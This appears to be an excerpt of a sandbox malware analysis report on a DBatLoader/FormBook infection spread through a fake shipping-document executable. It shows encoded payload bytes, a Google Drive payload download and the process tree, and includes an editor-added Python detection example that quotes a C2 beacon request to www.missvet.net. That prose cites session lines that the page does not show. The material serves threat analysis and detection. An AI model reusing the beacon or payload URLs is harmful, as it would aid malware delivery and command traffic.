X-GUploader-UploadID: AFiumC4xvQJU6v_LKuAE--3o9IJzOetbmstgAnmse6ojuUFLA3ysurmO-vs__La99MFIlfzVMfCMQkQ
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="233_Tizelcdhiry"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 820556
Last-Modified: Sun, 29 Dec 2024 22:32:21 GMT
Date: Mon, 30 Dec 2024 09:57:07 GMT
Expires: Mon, 30 Dec 2024 09:57:07 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=EWoTMw==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-12-30 09:57:07 UTC | 4939 | IN | Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 5a 45 79 59 64 44 78 45 55 4a 53 59 53 45 42 34 62 47 42 51 51 47 52 63 6d 46 68 49 50 45 42 41 59 4a 53 49 6e 4a 68 45 5a 44 78 77 6e 48 78 67 65 49 69 59 4f 46 68 63 53 48 68 34 64 47 53 55 52 47 69 55 4f 45 77 34 69 46 68 59 5a 49 78 2b 6d 72 71 56 5a 49 36 65 78 53 77 45 57 4a 78 49 5a 45 42 45 56 46 68 38 6d 70 71 36 6c 57 53 4f 6e 73 55 74 6f 59 6e 56 73 58 6d 42 6a 64 48 56 68 58 32 31 71 5a 32 4e 66 61 47 5a 31 5a 57 46 65 58 31 39 6e 64 48 46 32 64 57 42 6f 58 6d 74 32 62 6d 64 74 63 58 56 64 5a 57 5a 68 62 57 31 73 61 48 52 67 61 58 52 64 59 6c 31 78 5a 57 56 6f 63 6d 35 6f 59 6e 56 73 58 6d 42 6a 64 48 56 68 58 32 31 71 5a 32 4e 66 61 47 5a 31 5a 57 46 65 58 31 39 6e 64 48 46 32 64 57 42 6f 58 6d 74 32 62 6d 64
Data Ascii: pq6lWSOnsUsZEyYdDxEUJSYSEB4bGBQQGRcmFhIPEBAYJSInJhEZDxwnHxgeIiYOFhcSHh4dGSURGiUOEw4iFhYZIx+mrqVZI6exSwEWJxIZEBEVFh8mpq6lWSOnsUtoYnVsXmBjdHVhX21qZ2NfaGZ1ZWFeX19ndHF2dWBoXmt2bmdtcXVdZWZhbW1saHRgaXRdYl1xZWVocm5oYnVsXmBjdHVhX21qZ2NfaGZ1ZWFeX19ndHF2dWBoXmt2bmd
2024-12-30 09:57:07 UTC | 4819 | IN | Data Raw: 67 6e 70 6b 70 4d 46 56 36 55 6b 64 6b 50 2f 77 4f 59 57 50 2b 37 69 6c 55 35 2b 32 59 61 4e 33 63 6b 4a 4e 46 7a 57 4b 74 35 50 79 50 36 72 77 77 35 6f 6b 77 54 4b 67 5a 2f 4f 54 45 49 49 57 57 30 53 4b 74 46 71 4e 4f 67 65 44 46 2f 2b 59 5a 53 78 51 2b 61 6a 39 56 70 72 6e 49 44 62 61 44 65 43 36 4d 34 4e 30 63 37 52 45 46 2f 55 30 69 46 46 6b 6e 63 7a 59 50 38 53 67 42 50 73 77 46 6a 31 59 54 79 51 64 57 41 37 4a 44 6c 7a 56 4a 4b 78 58 4d 4a 7a 38 30 52 32 43 6e 33 76 62 63 6b 72 5a 69 71 34 6c 50 31 36 34 55 6d 71 32 65 45 58 4a 79 52 64 54 56 4b 5a 72 43 75 74 50 55 31 31 6c 52 2b 53 76 68 47 57 56 46 4a 4e 39 64 46 4b 69 55 68 51 74 46 55 4b 30 6f 42 49 77 52 4a 6f 46 69 54 70 39 48 54 66 6d 62 52 43 57 59 55 77 6a 67 35 62 62 61 68 56 75 35 31 71
Data Ascii: gnpkpMFV6UkdkP/wOYWP+7ilU5+2YaN3ckJNFzWKt5PyP6rww5okwTKgZ/OTEIIWW0SKtFqNOgeDF/+YZSxQ+aj9VprnIDbaDeC6M4N0c7REF/U0iFFknczYP8SgBPswFj1YTyQdWA7JDlzVJKxXMJz80R2Cn3vbckrZiq4lP164Umq2eEXJyRdTVKZrCutPU11lR+SvhGWVFJN9dFKiUhQtFUK0oBIwRJoFiTp9HTfmbRCWYUwjg5bbahVu51q
2024-12-30 09:57:07 UTC | 1324 | IN | Data Raw: 6a 71 2b 77 70 32 76 4c 6e 6d 6e 75 36 43 33 65 6c 65 71 79 51 6d 36 4e 38 41 33 75 50 31 34 53 36 68 68 6d 73 58 48 71 57 38 73 33 67 6c 77 38 59 31 53 31 77 73 69 5a 72 55 64 4f 4f 70 38 31 75 71 48 52 68 4d 37 32 56 51 55 52 68 44 44 5a 36 4d 51 41 76 35 79 53 38 33 74 53 44 73 70 79 45 58 56 44 79 4e 52 53 67 4c 43 50 64 78 64 75 37 6a 6f 49 6d 38 4d 49 6b 61 36 6f 2f 2f 67 77 47 51 42 58 6a 59 4f 47 38 4d 6a 46 4e 2b 74 78 69 39 61 7a 38 4b 63 78 56 79 43 48 4d 39 61 32 51 33 65 75 45 52 4c 38 79 75 34 6a 75 44 46 7a 72 61 6c 68 45 63 39 4b 58 2b 47 6c 52 76 7a 4a 7a 2b 6f 2f 46 4d 45 6b 46 4d 53 6f 69 33 2b 38 31 54 67 33 6d 4f 4d 6f 49 7a 52 72 35 6d 30 65 6a 44 74 4d 36 5a 4a 69 76 42 55 50 76 7a 31 71 4c 34 32 6c 45 4b 48 4a 67 77 78 4a 6c 44 4f
Data Ascii: jq+wp2vLnmnu6C3eleqyQm6N8A3uP14S6hhmsXHqW8s3glw8Y1S1wsiZrUdOOp81uqHRhM72VQURhDDZ6MQAv5yS83tSDspyEXVDyNRSgLCPdxdu7joIm8MIka6o//gwGQBXjYOG8MjFN+txi9az8KcxVyCHM9a2Q3euERL8yu4juDFzralhEc9KX+GlRvzJz+o/FMEkFMSoi3+81Tg3mOMoIzRr5m0ejDtM6ZJivBUPvz1qL42lEKHJgwxJlDO
2024-12-30 09:57:07 UTC | 1390 | IN | Data Raw: 2f 62 43 4d 58 64 50 48 78 42 6e 65 4e 75 54 34 57 4e 30 4e 2b 52 6c 57 76 50 47 77 58 31 5a 79 33 48 37 46 2f 65 6d 74 54 7a 6b 52 68 76 34 4e 38 33 41 69 62 46 64 49 50 63 73 6f 51 6c 35 6c 32 43 7a 35 54 4b 2b 7a 46 52 61 68 2f 68 47 32 58 53 39 67 70 53 75 47 37 45 63 31 44 44 4d 31 41 4b 35 67 77 32 42 57 57 35 34 41 41 52 63 65 66 4f 51 6e 47 4c 67 4d 79 67 62 44 50 41 4d 63 58 66 5a 54 77 42 76 78 41 72 49 52 2b 47 30 6b 78 63 46 41 58 2f 77 42 64 2f 6f 5a 32 77 73 70 6c 64 4d 6c 42 6a 55 4c 34 35 46 46 65 59 44 63 6b 4f 73 6a 74 52 68 66 4b 4a 61 50 47 38 74 6e 41 78 47 39 4e 67 54 33 6e 35 4d 61 52 61 77 6b 6f 47 6b 58 66 58 2b 4e 37 55 4b 59 53 56 43 30 37 4a 66 36 53 72 74 61 5a 66 44 35 48 49 4d 6e 30 6b 45 79 64 32 2f 62 45 45 59 4e 73 50 34
Data Ascii: /bCMXdPHxBneNuT4WN0N+RlWvPGwX1Zy3H7F/emtTzkRhv4N83AibFdIPcsoQl5l2Cz5TK+zFRah/hG2XS9gpSuG7Ec1DDM1AK5gw2BWW54AARcefOQnGLgMygbDPAMcXfZTwBvxArIR+G0kxcFAX/wBd/oZ2wspldMlBjUL45FFeYDckOsjtRhfKJaPG8tnAxG9NgT3n5MaRawkoGkXfX+N7UKYSVC07Jf6SrtaZfD5HIMn0kEyd2/bEEYNsP4
2024-12-30 09:57:07 UTC | 1390 | IN | Data Raw: 48 32 50 49 6e 76 58 73 43 55 79 38 55 64 74 53 35 39 42 46 57 70 48 77 4b 44 79 69 30 4f 61 66 54 78 72 64 42 61 75 54 32 7a 5a 64 58 33 36 67 70 37 39 46 78 70 52 50 4c 71 73 4e 75 35 32 59 6e 45 33 6a 62 38 58 74 79 44 58 4a 4e 57 65 33 4d 33 53 4c 66 70 49 39 72 46 4a 4b 56 5a 61 71 6c 55 32 6a 4f 56 41 68 78 69 6c 6d 44 4b 43 78 71 51 50 31 47 52 50 55 71 2b 59 45 4b 61 33 55 6b 2b 67 68 77 58 5a 50 73 64 4b 63 33 4b 66 48 41 34 4d 79 41 6b 55 56 6d 34 64 78 76 32 37 74 6e 52 5a 6e 37 74 4d 6c 6d 46 33 70 41 32 4e 69 2f 39 33 51 64 4c 31 4b 32 79 6d 36 59 6c 56 38 35 71 4e 36 75 76 52 30 55 63 45 50 2f 4d 4a 4c 69 63 64 75 56 6e 2f 51 68 6f 69 65 54 32 69 38 7a 5a 6c 63 71 6a 59 54 37 6a 63 75 59 61 2f 43 74 54 68 72 59 37 2b 58 38 4e 54 49 6e 75 57
Data Ascii: H2PInvXsCUy8UdtS59BFWpHwKDyi0OafTxrdBauT2zZdX36gp79FxpRPLqsNu52YnE3jb8XtyDXJNWe3M3SLfpI9rFJKVZaqlU2jOVAhxilmDKCxqQP1GRPUq+YEKa3Uk+ghwXZPsdKc3KfHA4MyAkUVm4dxv27tnRZn7tMlmF3pA2Ni/93QdL1K2ym6YlV85qN6uvR0UcEP/MJLicduVn/QhoieT2i8zZlcqjYT7jcuYa/CtThrY7+X8NTInuW
2024-12-30 09:57:07 UTC | 1390 | IN | Data Raw: 6e 45 62 72 6a 54 53 56 68 4b 64 33 4d 64 53 52 57 68 45 64 73 75 6d 48 69 31 4e 33 54 44 4e 53 37 4f 64 79 49 46 58 76 33 53 75 34 59 43 6f 6c 61 56 52 68 56 7a 44 56 56 73 30 77 43 6a 47 44 36 79 39 75 4a 76 34 47 34 68 67 30 58 30 6e 39 44 55 70 77 70 71 47 35 63 4c 5a 45 78 4e 56 78 62 70 4b 35 63 52 55 46 42 77 41 66 72 30 41 73 72 4e 37 73 4c 39 4d 38 43 4f 38 6d 4e 59 31 6f 56 41 53 6d 7a 51 41 64 46 6f 56 56 33 54 55 77 45 61 79 69 65 74 49 69 36 66 2f 54 2b 66 69 53 77 6c 72 30 7a 61 58 6a 64 62 6a 51 62 4f 51 49 48 2b 31 54 55 6c 32 32 52 69 58 61 6a 56 46 43 47 67 53 6d 55 4e 53 56 42 36 67 57 36 66 65 4e 31 31 6d 45 57 4b 5a 73 74 61 30 53 62 6e 4d 72 46 6f 4f 59 4f 4f 65 56 42 79 66 5a 30 37 65 65 6e 63 74 57 6a 61 2b 42 68 69 35 61 68 2b 46
Data Ascii: nEbrjTSVhKd3MdSRWhEdsumHi1N3TDNS7OdyIFXv3Su4YColaVRhVzDVVs0wCjGD6y9uJv4G4hg0X0n9DUpwpqG5cLZExNVxbpK5cRUFBwAfr0AsrN7sL9M8CO8mNY1oVASmzQAdFoVV3TUwEayietIi6f/T+fiSwlr0zaXjdbjQbOQIH+1TUl22RiXajVFCGgSmUNSVB6gW6feN11mEWKZsta0SbnMrFoOYOOeVByfZ07eenctWja+Bhi5ah+F
2024-12-30 09:57:07 UTC | 1390 | IN | Data Raw: 37 50 73 5a 68 36 6a 77 78 54 71 54 2f 67 4f 59 4f 74 77 55 43 4c 76 48 63 53 42 31 6b 51 69 43 79 68 43 4e 44 50 4d 56 70 71 48 31 33 33 31 2f 74 41 54 53 74 46 35 55 69 78 55 2f 4c 46 50 6c 46 35 57 53 41 70 2b 71 7a 2b 46 6c 41 4b 65 64 4a 39 39 49 59 64 70 6e 39 62 70 59 4a 76 61 45 38 2b 53 42 79 59 57 33 57 53 33 65 79 78 50 32 59 51 4a 63 75 2f 36 44 37 54 49 6a 79 4e 7a 43 4f 58 4f 57 57 56 4d 48 43 49 57 59 6b 4d 7a 46 52 49 73 78 4b 46 33 72 41 37 62 2b 7a 44 69 70 48 70 76 32 41 59 61 78 30 41 62 30 49 6b 39 50 51 54 2f 65 77 71 33 76 73 67 4c 4b 30 65 42 55 38 34 66 6b 65 67 58 58 66 71 68 66 69 48 49 30 4b 73 76 62 34 75 38 72 42 43 76 78 79 50 35 4d 34 57 4a 38 34 34 54 30 38 51 4a 33 53 78 5a 73 55 30 73 2b 73 79 51 6e 63 4c 53 4b 63 64 4e
Data Ascii: 7PsZh6jwxTqT/gOYOtwUCLvHcSB1kQiCyhCNDPMVpqH1331/tATStF5UixU/LFPlF5WSAp+qz+FlAKedJ99IYdpn9bpYJvaE8+SByYW3WS3eyxP2YQJcu/6D7TIjyNzCOXOWWVMHCIWYkMzFRIsxKF3rA7b+zDipHpv2AYax0Ab0Ik9PQT/ewq3vsgLK0eBU84fkegXXfqhfiHI0Ksvb4u8rBCvxyP5M4WJ844T08QJ3SxZsU0s+syQncLSKcdN
2024-12-30 09:57:07 UTC | 1390 | IN | Data Raw: 68 45 74 32 41 37 4c 47 44 41 32 74 73 53 41 48 43 2b 32 2b 51 74 30 4a 41 55 59 48 6e 71 30 34 6b 50 69 6f 44 44 76 39 50 70 59 71 66 31 72 55 75 57 70 4e 4e 35 38 68 51 30 55 69 4a 32 66 53 74 7a 49 6d 34 62 47 42 52 76 38 52 6e 7a 31 35 65 72 44 7a 6e 42 48 4d 66 33 6e 49 6c 6c 49 59 34 4e 66 79 34 69 4c 38 59 4e 31 51 30 4d 43 48 36 68 48 6e 4b 34 33 62 47 6f 61 78 72 73 72 45 59 31 6e 64 36 38 45 58 51 47 63 4b 43 2b 4b 6f 52 72 7a 38 62 63 64 34 65 36 62 6b 6d 38 51 56 74 38 49 67 76 6c 4c 4d 71 76 36 47 53 55 35 68 44 54 59 4a 58 79 72 2b 6f 51 53 58 56 67 30 6a 6a 42 35 36 79 67 69 77 62 59 71 51 33 6e 4d 69 63 4e 57 47 31 42 71 77 32 4e 38 59 63 66 49 6e 74 43 52 56 50 48 6a 36 48 76 72 48 61 66 71 75 79 75 64 71 39 51 6a 6c 6c 5a 37 37 65 62 43
Data Ascii: hEt2A7LGDA2tsSAHC+2+Qt0JAUYHnq04kPioDDv9PpYqf1rUuWpNN58hQ0UiJ2fStzIm4bGBRv8Rnz15erDznBHMf3nIllIY4Nfy4iL8YN1Q0MCH6hHnK43bGoaxrsrEY1nd68EXQGcKC+KoRrz8bcd4e6bkm8QVt8IgvlLMqv6GSU5hDTYJXyr+oQSXVg0jjB56ygiwbYqQ3nMicNWG1Bqw2N8YcfIntCRVPHj6HvrHafquyudq9QjllZ77ebC
2024-12-30 09:57:07 UTC | 1390 | IN | Data Raw: 4a 6a 30 4f 72 72 68 61 73 61 4e 77 57 4f 53 78 4b 71 31 4c 72 36 58 2f 54 67 72 6f 32 42 6b 79 34 41 70 38 4c 4a 39 66 53 6d 43 4f 39 7a 6c 65 31 59 37 4b 46 31 76 30 64 77 57 35 5a 36 50 51 31 79 42 38 6b 74 79 79 76 36 50 45 33 73 7a 4c 76 39 4a 48 37 72 46 70 74 6f 43 50 45 6a 6d 38 74 38 6a 46 58 77 31 39 51 34 44 72 52 31 50 4a 2b 39 67 2b 6b 64 50 73 65 61 5a 47 56 73 4f 64 75 72 34 79 4b 4f 68 4a 4d 58 48 62 50 6c 34 65 71 76 44 53 70 2b 49 75 6e 78 4d 59 68 51 45 67 66 73 7a 6f 49 48 67 54 6f 6f 67 50 73 65 5a 79 6b 75 30 50 58 6a 50 6a 46 7a 6f 42 79 79 39 38 58 4b 33 34 66 67 67 74 53 78 32 39 53 74 37 79 78 72 45 6e 42 66 72 37 71 50 59 67 41 56 36 30 67 4f 4b 47 48 61 6e 64 6d 65 53 2f 48 79 4a 36 6d 44 53 74 7a 66 62 59 2f 33 77 46 4b 6f 4c
Data Ascii: Jj0OrrhasaNwWOSxKq1Lr6X/Tgro2Bky4Ap8LJ9fSmCO9zle1Y7KF1v0dwW5Z6PQ1yB8ktyyv6PE3szLv9JH7rFptoCPEjm8t8jFXw19Q4DrR1PJ+9g+kdPseaZGVsOdur4yKOhJMXHbPl4eqvDSp+IunxMYhQEgfszoIHgToogPseZyku0PXjPjFzoByy98XK34fggtSx29St7yxrEnBfr7qPYgAV60gOKGHandmeS/HyJ6mDStzfbY/3wFKoL
2024-12-30 09:57:07 UTC | 1390 | IN | Data Raw: 6a 6b 37 68 67 45 31 66 43 50 6d 4a 74 56 79 50 72 33 70 63 48 49 4a 42 4c 52 34 46 6d 38 6f 44 58 33 6d 45 55 57 4d 69 69 31 78 66 6b 78 72 68 79 59 62 62 39 6d 35 39 38 47 34 65 53 44 46 4e 4f 77 55 48 65 62 41 4b 46 6b 74 7a 4b 42 65 52 2f 77 76 54 5a 4e 57 6a 7a 70 51 6b 52 30 66 77 4f 6d 72 75 6f 43 6f 78 79 49 78 59 2b 54 31 6c 4b 79 79 4e 47 33 69 31 48 2b 71 73 77 35 38 73 66 4b 5a 55 4e 31 69 49 35 50 56 36 54 47 32 6c 69 39 4f 7a 61 44 54 43 61 72 4e 34 61 48 30 45 75 76 63 66 30 73 44 38 6c 64 34 68 65 73 77 4d 55 78 71 43 6d 2b 37 37 44 57 4f 6a 4d 51 72 70 50 68 59 2f 56 47 62 53 4e 72 4a 38 7a 74 71 6f 57 78 6a 32 65 2f 2b 2f 36 6e 43 2b 45 6b 50 38 6e 31 69 7a 32 72 31 39 37 44 53 6e 55 33 46 4d 77 56 56 52 6e 2b 50 4a 77 37 47 34 75 78 6c
Data Ascii: jk7hgE1fCPmJtVyPr3pcHIJBLR4Fm8oDX3mEUWMii1xfkxrhyYbb9m598G4eSDFNOwUHebAKFktzKBeR/wvTZNWjzpQkR0fwOmruoCoxyIxY+T1lKyyNG3i1H+qsw58sfKZUN1iI5PV6TG2li9OzaDTCarN4aH0Euvcf0sD8ld4heswMUxqCm+77DWOjMQrpPhY/VGbSNrJ8ztqoWxj2e/+/6nC+EkP8n1iz2r197DSnU3FMwVVRn+PJw7G4uxl
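The three sessions above show two behaviours worth turning into detections: the beacon from the randomly named executable under Program Files (x86) (a short directory path with two query parameters, one of them a long base64-looking blob, sent with a mobile-browser User-Agent over cleartext HTTP and answered with a 301 to the apex domain), and the earlier staged download in which the submitted sample fetches an 820556-byte application/octet-stream attachment from Google Drive with the WinHttp.WinHttpRequest.5 User-Agent, following a 303 from drive.google.com to drive.usercontent.google.com. The following Python is an added example written for this page, not code from Joe Sandbox or from either malware family's authors; the session records are constructed from the request and response lines printed above, and the heuristics, thresholds and function names are assumptions.

```python
# Added example (editor's code, not from the Joe Sandbox report). The session
# records are constructed from the request/response lines printed above; the
# heuristics, thresholds and function names are assumptions.
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit


@dataclass
class HttpSession:
    session_id: int
    pid: int
    process: str        # image path of the process that opened the socket
    dst_port: int
    request_line: str   # raw request line, e.g. "GET /htux/?yt=... HTTP/1.1"
    host: str
    user_agent: str
    status: int = 0
    resp: dict = field(default_factory=dict)   # response headers, lower-case keys


SAMPLE_EXE = (r"C:\Users\user\Desktop\Airway bill details - Delivery receipt "
              r"Contact Form no_45987165927 ,pdf.scr.exe")
DROPPED_EXE = (r"C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI"
               r"\WQzLddwiZR.exe")
DRIVE_ID = "1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1"
WINHTTP_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

# Sessions 8, 0 and 1 as printed in the report (values copied from the page).
SESSIONS = [
    HttpSession(8, 4608, DROPPED_EXE, 80,
                "GET /htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9GnpCYVVBAJgHu"
                "DCTCUS1tunX2/M4ihm7EfJFMVRSEfiRcDq1K8lUuiYdkyOhgpRhKJF9gKDaUZ1llgaIE/O30= HTTP/1.1",
                "www.missvet.net",
                "Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36",
                301, {"content-length": "0"}),
    HttpSession(0, 5016, SAMPLE_EXE, 443,
                f"GET /uc?export=download&id={DRIVE_ID} HTTP/1.1", "drive.google.com", WINHTTP_UA,
                303, {"location": f"https://drive.usercontent.google.com/download?id={DRIVE_ID}&export=download",
                      "content-length": "0"}),
    HttpSession(1, 5016, SAMPLE_EXE, 443,
                f"GET /download?id={DRIVE_ID}&export=download HTTP/1.1", "drive.usercontent.google.com", WINHTTP_UA,
                200, {"content-type": "application/octet-stream",
                      "content-disposition": 'attachment; filename="233_Tizelcdhiry"',
                      "content-length": "820556"}),
]

# Assumed thresholds: 40+ letter directory under Program Files, 60+ char base64-looking query value.
RANDOM_PF_DIR = re.compile(r"^C:\\Program Files( \(x86\))?\\[A-Za-z]{40,}\\[A-Za-z]{6,}\.exe$")
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{60,}={0,2}$")
MIN_PAYLOAD_BYTES = 100_000   # assumed; the payload in this report is 820556 bytes


def split_request(request_line):
    """Return (method, path, query dict) for a raw HTTP request line."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, parse_qs(parts.query, keep_blank_values=True)


def beacon_reasons(s):
    """Traits shared with the beacon of session 8; an empty list means no match."""
    method, path, qs = split_request(s.request_line)
    reasons = []
    if (method == "GET" and re.fullmatch(r"/[a-z0-9]{2,8}/", path) and len(qs) == 2
            and any(B64_BLOB.match(v[0]) for v in qs.values())):
        reasons.append("short directory path with two query params, one a base64-like blob")
    if RANDOM_PF_DIR.match(s.process):
        reasons.append("client runs from a randomly named directory under Program Files")
    if "Android" in s.user_agent and s.process.lower().endswith(".exe"):
        reasons.append("mobile-browser User-Agent sent by a Windows executable")
    if s.dst_port == 80:
        reasons.append("cleartext HTTP on port 80")
    return reasons


def payload_fetch_reasons(s):
    """Traits shared with the scripted Google Drive download of sessions 0 and 1."""
    qs = split_request(s.request_line)[2]
    reasons = []
    if "WinHttp.WinHttpRequest" in s.user_agent:
        reasons.append("WinHttpRequest User-Agent: scripted download, not a browser")
    if s.host.endswith("google.com") and qs.get("export") == ["download"] and "id" in qs:
        reasons.append("Google Drive direct-download URL")
    if (s.status == 200 and s.resp.get("content-type") == "application/octet-stream"
            and s.resp.get("content-disposition", "").startswith("attachment")
            and int(s.resp.get("content-length", "0")) > MIN_PAYLOAD_BYTES):
        reasons.append("large octet-stream attachment returned")
    if s.process.lower().startswith("c:\\users\\") and "\\desktop\\" in s.process.lower():
        reasons.append("initiated by an executable launched from the user's Desktop")
    return reasons


def drive_download_chain(sessions):
    """Pair each 303 from Google Drive with the same-PID 200 that fetched the file id it pointed to."""
    chains = []
    for a in (x for x in sessions if x.status == 303 and "location" in x.resp):
        file_id = parse_qs(urlsplit(a.resp["location"]).query).get("id", [None])[0]
        for b in sessions:
            if (b is not a and b.pid == a.pid and b.status == 200 and file_id
                    and split_request(b.request_line)[2].get("id") == [file_id]):
                chains.append((a.session_id, b.session_id, file_id, int(b.resp.get("content-length", "0"))))
    return chains
```

Run over the three constructed sessions, `beacon_reasons` fires on all four traits for session 8 and on none for the Google Drive sessions, `payload_fetch_reasons` fires on three traits for the 303 and four for the 200, and `drive_download_chain` links session 0 to session 1 through the shared file id and reports the 820556-byte body. Each trait on its own is weak (plenty of legitimate software uses WinHttpRequest, and Google Drive serves legitimate attachments), so the functions return the list of matched traits rather than a verdict, leaving the scoring to the caller.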


Target ID: 0
Start time: 04:57:01
Start date: 30/12/2024
Path: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe"
Imagebase: 0x400000
File size: 1'364'480 bytes
MD5 hash: 09F4F91713BD6588465534822D5AD96C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2231702231.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2191756371.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 04:57:07
Start date: 30/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:04:57:07
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:04:57:08
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Imagebase:0x400000
                                                                                                  File size:175'800 bytes
                                                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:04:57:21
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\Tizelcdh.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Tizelcdh.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'364'480 bytes
                                                                                                  MD5 hash:09F4F91713BD6588465534822D5AD96C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2342771726.0000000002226000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 26%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:04:57:22
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:04:57:23
                                                                                                  Start date:30/12/2024
